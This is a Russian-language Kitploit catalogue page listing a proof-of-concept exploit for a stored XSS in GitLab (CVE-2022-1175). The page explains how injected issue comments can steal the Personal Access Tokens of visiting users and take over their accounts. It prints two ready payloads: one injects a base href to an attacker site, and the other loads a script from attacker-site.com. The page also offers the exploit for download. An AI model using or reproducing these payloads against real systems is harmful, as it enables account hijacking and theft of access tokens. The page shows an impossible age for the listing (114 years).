Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-1175 — Эксплойт с доказательством концепции для хранимого XSS в GitLab (CVE-2022-1175), позволяющий кражу персонального токена доступа и захват учётной записи через вредоносные комментарии к задачам. | Kitploit
Инструменты/GitHubGitHub/greenwolf/cve-2022-1175
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubgreenwolf/cve-2022-1175

CVE-2022-1175

Эксплойт с доказательством концепции для хранимого XSS в GitLab (CVE-2022-1175), позволяющий кражу персонального токена доступа и захват учётной записи через вредоносные комментарии к задачам.

Репозиторий
114 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-1175

Хранимая XSS-уязвимость GitLab может быть установлена в issue проекта, как своего, так и чужого. Позволяет такие атаки, как создание и кража Personal Access Token (PAT) любого, кто посещает issue. PAT затем могут предоставить полный доступ к GitLab API от имени этого пользователя, что эквивалентно полному захвату аккаунта.

Может быть использована путем изменения базового URL проекта на ваш сайт, так что скрипты будут загружаться с вашего сайта. Измените JavaScript на вашем сайте, чтобы он соответствовал именам скриптов, вызываемых на странице. Однако это может нарушить работу страницы.

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><base href=http://unsafe-website.com/><pre x=&#34;"><code></code></pre>

Обычное включение скрипта также работает в зависимости от политики CSP сайта. Это более скрытно.

<pre data-sourcepos="&#34;%22 href=&#34;x&#34;></pre><script src="https://attacker-site.com/bad.js"></script><pre x=&#34;"><code></code></pre>

Разработчики GitLab любезно включили полную строку XSS в код, которую можно найти здесь:

https://gitlab.com/gitlab-org/gitlab/-/compare/v14.9.1-ee...v14.9.2-ee?from_project_id=278964&page=4

Ссылка:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175

Скачать инструмент